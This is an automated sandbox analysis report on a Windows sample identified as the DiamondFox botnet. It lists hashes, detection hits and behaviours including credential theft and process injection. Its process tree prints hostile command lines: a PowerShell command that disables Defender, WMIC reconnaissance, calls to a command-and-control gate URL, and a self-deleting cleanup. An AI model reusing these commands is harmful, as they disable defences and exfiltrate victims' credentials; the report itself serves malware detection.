Analysis
-
max time kernel
131s -
max time network
139s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
04-07-2021 00:03
Static task
static1
Behavioral task
behavioral1
Sample
windef.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
windef.exe
Resource
win10v20210408
General
-
Target
windef.exe
-
Size
203KB
-
MD5
a1e165e1926c0c83123c89fce6b1af56
-
SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f
-
SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
-
SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
Malware Config
Signatures
-
DiamondFox
DiamondFox is a multipurpose botnet with many capabilities.
-
DiamondFox payload 10 IoCs
Detects DiamondFox payload in file/memory.
resource yara_rule behavioral2/files/0x000300000001ab50-115.dat diamondfox behavioral2/files/0x000300000001ab50-116.dat diamondfox behavioral2/files/0x000300000001ab50-197.dat diamondfox behavioral2/files/0x000300000001ab50-204.dat diamondfox behavioral2/files/0x000300000001ab50-207.dat diamondfox behavioral2/files/0x000300000001ab50-210.dat diamondfox behavioral2/files/0x000300000001ab50-213.dat diamondfox behavioral2/files/0x000300000001ab50-215.dat diamondfox behavioral2/files/0x000300000001ab50-220.dat diamondfox behavioral2/files/0x000300000001ab50-223.dat diamondfox -
NirSoft MailPassView 2 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral2/memory/676-209-0x000000000044412E-mapping.dmp MailPassView behavioral2/memory/676-211-0x0000000000400000-0x0000000000455000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 2 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/memory/2284-196-0x00000000004466F4-mapping.dmp WebBrowserPassView behavioral2/memory/2284-198-0x0000000000400000-0x000000000047C000-memory.dmp WebBrowserPassView -
Nirsoft 6 IoCs
resource yara_rule behavioral2/memory/2284-196-0x00000000004466F4-mapping.dmp Nirsoft behavioral2/memory/2284-198-0x0000000000400000-0x000000000047C000-memory.dmp Nirsoft behavioral2/memory/2320-206-0x0000000000413E10-mapping.dmp Nirsoft behavioral2/memory/2320-208-0x0000000000400000-0x0000000000422000-memory.dmp Nirsoft behavioral2/memory/676-209-0x000000000044412E-mapping.dmp Nirsoft behavioral2/memory/676-211-0x0000000000400000-0x0000000000455000-memory.dmp Nirsoft -
Downloads MZ/PE file
-
Executes dropped EXE 10 IoCs
pid Process 3128 MicrosoftEdgeCPS.exe 2284 MicrosoftEdgeCPS.exe 1184 MicrosoftEdgeCPS.exe 2320 MicrosoftEdgeCPS.exe 676 MicrosoftEdgeCPS.exe 3356 MicrosoftEdgeCPS.exe 1020 MicrosoftEdgeCPS.exe 3064 MicrosoftEdgeCPS.exe 3116 MicrosoftEdgeCPS.exe 2940 localmgr.exe -
Deletes itself 1 IoCs
pid Process 412 powershell.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 8 IoCs
description pid Process procid_target PID 3128 set thread context of 2284 3128 MicrosoftEdgeCPS.exe 97 PID 3128 set thread context of 1184 3128 MicrosoftEdgeCPS.exe 98 PID 3128 set thread context of 2320 3128 MicrosoftEdgeCPS.exe 99 PID 3128 set thread context of 676 3128 MicrosoftEdgeCPS.exe 100 PID 3128 set thread context of 3356 3128 MicrosoftEdgeCPS.exe 101 PID 3128 set thread context of 1020 3128 MicrosoftEdgeCPS.exe 104 PID 3128 set thread context of 3064 3128 MicrosoftEdgeCPS.exe 105 PID 3128 set thread context of 3116 3128 MicrosoftEdgeCPS.exe 106 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 4 IoCs
pid Process 3216 taskkill.exe 4064 taskkill.exe 1552 taskkill.exe 2060 taskkill.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 3652 notepad.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 508 powershell.exe 412 powershell.exe 412 powershell.exe 508 powershell.exe 412 powershell.exe 508 powershell.exe 3128 MicrosoftEdgeCPS.exe 3128 MicrosoftEdgeCPS.exe 2284 MicrosoftEdgeCPS.exe 2284 MicrosoftEdgeCPS.exe 2284 MicrosoftEdgeCPS.exe 2284 MicrosoftEdgeCPS.exe 2320 MicrosoftEdgeCPS.exe 2320 MicrosoftEdgeCPS.exe 3128 MicrosoftEdgeCPS.exe 3128 MicrosoftEdgeCPS.exe 3128 MicrosoftEdgeCPS.exe 3128 MicrosoftEdgeCPS.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 2284 wmic.exe Token: SeSecurityPrivilege 2284 wmic.exe Token: SeTakeOwnershipPrivilege 2284 wmic.exe Token: SeLoadDriverPrivilege 2284 wmic.exe Token: SeSystemProfilePrivilege 2284 wmic.exe Token: SeSystemtimePrivilege 2284 wmic.exe Token: SeProfSingleProcessPrivilege 2284 wmic.exe Token: SeIncBasePriorityPrivilege 2284 wmic.exe Token: SeCreatePagefilePrivilege 2284 wmic.exe Token: SeBackupPrivilege 2284 wmic.exe Token: SeRestorePrivilege 2284 wmic.exe Token: SeShutdownPrivilege 2284 wmic.exe Token: SeDebugPrivilege 2284 wmic.exe Token: SeSystemEnvironmentPrivilege 2284 wmic.exe Token: SeRemoteShutdownPrivilege 2284 wmic.exe Token: SeUndockPrivilege 2284 wmic.exe Token: SeManageVolumePrivilege 2284 wmic.exe Token: 33 2284 wmic.exe Token: 34 2284 wmic.exe Token: 35 2284 wmic.exe Token: 36 2284 wmic.exe Token: SeIncreaseQuotaPrivilege 2284 wmic.exe Token: SeSecurityPrivilege 2284 wmic.exe Token: SeTakeOwnershipPrivilege 2284 wmic.exe Token: SeLoadDriverPrivilege 2284 wmic.exe Token: SeSystemProfilePrivilege 2284 wmic.exe Token: SeSystemtimePrivilege 2284 wmic.exe Token: SeProfSingleProcessPrivilege 2284 wmic.exe Token: SeIncBasePriorityPrivilege 2284 wmic.exe Token: SeCreatePagefilePrivilege 2284 wmic.exe Token: SeBackupPrivilege 2284 wmic.exe Token: SeRestorePrivilege 2284 wmic.exe Token: SeShutdownPrivilege 2284 wmic.exe Token: SeDebugPrivilege 2284 wmic.exe Token: SeSystemEnvironmentPrivilege 2284 wmic.exe Token: SeRemoteShutdownPrivilege 2284 wmic.exe Token: SeUndockPrivilege 2284 wmic.exe Token: SeManageVolumePrivilege 2284 wmic.exe Token: 33 2284 wmic.exe Token: 34 2284 wmic.exe Token: 35 2284 wmic.exe Token: 36 2284 wmic.exe Token: SeDebugPrivilege 412 powershell.exe Token: SeIncreaseQuotaPrivilege 3836 wmic.exe Token: SeSecurityPrivilege 3836 wmic.exe Token: SeTakeOwnershipPrivilege 3836 wmic.exe Token: SeLoadDriverPrivilege 3836 wmic.exe Token: SeSystemProfilePrivilege 3836 wmic.exe Token: SeSystemtimePrivilege 3836 wmic.exe Token: SeProfSingleProcessPrivilege 3836 wmic.exe Token: SeIncBasePriorityPrivilege 3836 wmic.exe Token: SeCreatePagefilePrivilege 3836 wmic.exe Token: SeBackupPrivilege 3836 wmic.exe Token: SeRestorePrivilege 3836 wmic.exe Token: SeShutdownPrivilege 3836 wmic.exe Token: SeDebugPrivilege 3836 wmic.exe Token: SeSystemEnvironmentPrivilege 3836 wmic.exe Token: SeRemoteShutdownPrivilege 3836 wmic.exe Token: SeUndockPrivilege 3836 wmic.exe Token: SeManageVolumePrivilege 3836 wmic.exe Token: 33 3836 wmic.exe Token: 34 3836 wmic.exe Token: 35 3836 wmic.exe Token: 36 3836 wmic.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 1184 MicrosoftEdgeCPS.exe 1020 MicrosoftEdgeCPS.exe 3064 MicrosoftEdgeCPS.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 804 wrote to memory of 3128 804 windef.exe 76 PID 804 wrote to memory of 3128 804 windef.exe 76 PID 804 wrote to memory of 3128 804 windef.exe 76 PID 804 wrote to memory of 412 804 windef.exe 80 PID 804 wrote to memory of 412 804 windef.exe 80 PID 804 wrote to memory of 412 804 windef.exe 80 PID 3128 wrote to memory of 508 3128 MicrosoftEdgeCPS.exe 79 PID 3128 wrote to memory of 508 3128 MicrosoftEdgeCPS.exe 79 PID 3128 wrote to memory of 508 3128 MicrosoftEdgeCPS.exe 79 PID 3128 wrote to memory of 2284 3128 MicrosoftEdgeCPS.exe 81 PID 3128 wrote to memory of 2284 3128 MicrosoftEdgeCPS.exe 81 PID 3128 wrote to memory of 2284 3128 MicrosoftEdgeCPS.exe 81 PID 3128 wrote to memory of 3836 3128 MicrosoftEdgeCPS.exe 84 PID 3128 wrote to memory of 3836 3128 MicrosoftEdgeCPS.exe 84 PID 3128 wrote to memory of 3836 3128 MicrosoftEdgeCPS.exe 84 PID 3128 wrote to memory of 2880 3128 MicrosoftEdgeCPS.exe 87 PID 3128 wrote to memory of 2880 3128 MicrosoftEdgeCPS.exe 87 PID 3128 wrote to memory of 2880 3128 MicrosoftEdgeCPS.exe 87 PID 3128 wrote to memory of 2288 3128 MicrosoftEdgeCPS.exe 89 PID 3128 wrote to memory of 2288 3128 MicrosoftEdgeCPS.exe 89 PID 3128 wrote to memory of 2288 3128 MicrosoftEdgeCPS.exe 89 PID 3128 wrote to memory of 3536 3128 MicrosoftEdgeCPS.exe 91 PID 3128 wrote to memory of 3536 3128 MicrosoftEdgeCPS.exe 91 PID 3128 wrote to memory of 3536 3128 MicrosoftEdgeCPS.exe 91 PID 3128 wrote to memory of 804 3128 MicrosoftEdgeCPS.exe 93 PID 3128 wrote to memory of 804 3128 MicrosoftEdgeCPS.exe 93 PID 3128 wrote to memory of 804 3128 MicrosoftEdgeCPS.exe 93 PID 3128 wrote to memory of 2256 3128 MicrosoftEdgeCPS.exe 95 PID 3128 wrote to memory of 2256 3128 MicrosoftEdgeCPS.exe 95 PID 3128 wrote to memory of 2256 3128 MicrosoftEdgeCPS.exe 95 PID 3128 wrote to memory of 2284 3128 MicrosoftEdgeCPS.exe 97 PID 3128 wrote to memory of 2284 3128 MicrosoftEdgeCPS.exe 97 PID 3128 wrote to memory of 2284 3128 MicrosoftEdgeCPS.exe 97 PID 3128 wrote to memory of 2284 3128 MicrosoftEdgeCPS.exe 97 PID 3128 wrote to memory of 2284 3128 MicrosoftEdgeCPS.exe 97 PID 3128 wrote to memory of 2284 3128 MicrosoftEdgeCPS.exe 97 PID 3128 wrote to memory of 2284 3128 MicrosoftEdgeCPS.exe 97 PID 3128 wrote to memory of 2284 3128 MicrosoftEdgeCPS.exe 97 PID 3128 wrote to memory of 2284 3128 MicrosoftEdgeCPS.exe 97 PID 3128 wrote to memory of 1184 3128 MicrosoftEdgeCPS.exe 98 PID 3128 wrote to memory of 1184 3128 MicrosoftEdgeCPS.exe 98 PID 3128 wrote to memory of 1184 3128 MicrosoftEdgeCPS.exe 98 PID 3128 wrote to memory of 1184 3128 MicrosoftEdgeCPS.exe 98 PID 3128 wrote to memory of 1184 3128 MicrosoftEdgeCPS.exe 98 PID 3128 wrote to memory of 1184 3128 MicrosoftEdgeCPS.exe 98 PID 3128 wrote to memory of 1184 3128 MicrosoftEdgeCPS.exe 98 PID 3128 wrote to memory of 1184 3128 MicrosoftEdgeCPS.exe 98 PID 3128 wrote to memory of 2320 3128 MicrosoftEdgeCPS.exe 99 PID 3128 wrote to memory of 2320 3128 MicrosoftEdgeCPS.exe 99 PID 3128 wrote to memory of 2320 3128 MicrosoftEdgeCPS.exe 99 PID 3128 wrote to memory of 2320 3128 MicrosoftEdgeCPS.exe 99 PID 3128 wrote to memory of 2320 3128 MicrosoftEdgeCPS.exe 99 PID 3128 wrote to memory of 2320 3128 MicrosoftEdgeCPS.exe 99 PID 3128 wrote to memory of 2320 3128 MicrosoftEdgeCPS.exe 99 PID 3128 wrote to memory of 2320 3128 MicrosoftEdgeCPS.exe 99 PID 3128 wrote to memory of 2320 3128 MicrosoftEdgeCPS.exe 99 PID 3128 wrote to memory of 676 3128 MicrosoftEdgeCPS.exe 100 PID 3128 wrote to memory of 676 3128 MicrosoftEdgeCPS.exe 100 PID 3128 wrote to memory of 676 3128 MicrosoftEdgeCPS.exe 100 PID 3128 wrote to memory of 676 3128 MicrosoftEdgeCPS.exe 100 PID 3128 wrote to memory of 676 3128 MicrosoftEdgeCPS.exe 100 PID 3128 wrote to memory of 676 3128 MicrosoftEdgeCPS.exe 100 PID 3128 wrote to memory of 676 3128 MicrosoftEdgeCPS.exe 100 PID 3128 wrote to memory of 676 3128 MicrosoftEdgeCPS.exe 100
Processes
-
C:\Users\Admin\AppData\Local\Temp\windef.exe"C:\Users\Admin\AppData\Local\Temp\windef.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:804 -
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3128 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableRealtimeMonitoring 13⤵
- Suspicious behavior: EnumeratesProcesses
PID:508
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" /Node:localhost /Namespace:\\root\SecurityCenter2 path AntiVirusProduct get DisplayName /FORMAT:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2284
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" os get caption /FORMAT:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3836
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_VideoController get caption /FORMAT:List3⤵PID:2880
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_NetworkAdapterConfiguration where IPEnabled=1 get IPAddress /FORMAT:List3⤵PID:2288
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" LogicalDisk Where DriveType=4 get VolumeName /FORMAT:List3⤵PID:3536
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List3⤵PID:804
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List3⤵PID:2256
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\1.log"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2284
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\4.log"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1184
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\2.log"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2320
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\3.log"3⤵
- Executes dropped EXE
PID:676
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d83⤵
- Executes dropped EXE
PID:3356 -
C:\Windows\notepad.exeX C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe4⤵
- Opens file in notepad (likely ransom note)
PID:3652
-
-
C:\Windows\write.exeX C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe4⤵PID:2268
-
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d83⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1020
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d83⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3064
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d83⤵
- Executes dropped EXE
PID:3116
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List3⤵PID:2200
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List3⤵PID:1816
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /PID 3356 /F3⤵
- Kills process with taskkill
PID:4064
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /PID 3064 /F3⤵
- Kills process with taskkill
PID:1552
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /PID 3116 /F3⤵
- Kills process with taskkill
PID:2060
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /PID 1020 /F3⤵
- Kills process with taskkill
PID:3216
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List3⤵PID:3660
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List3⤵PID:2112
-
-
C:\Users\Admin\AppData\Local\Temp\localmgr.exe"C:\Users\Admin\AppData\Local\Temp\localmgr.exe"3⤵
- Executes dropped EXE
PID:2940
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Start-Sleep -s 10; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\windef.exe' -Force -Recurse2⤵
- Deletes itself
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:412
-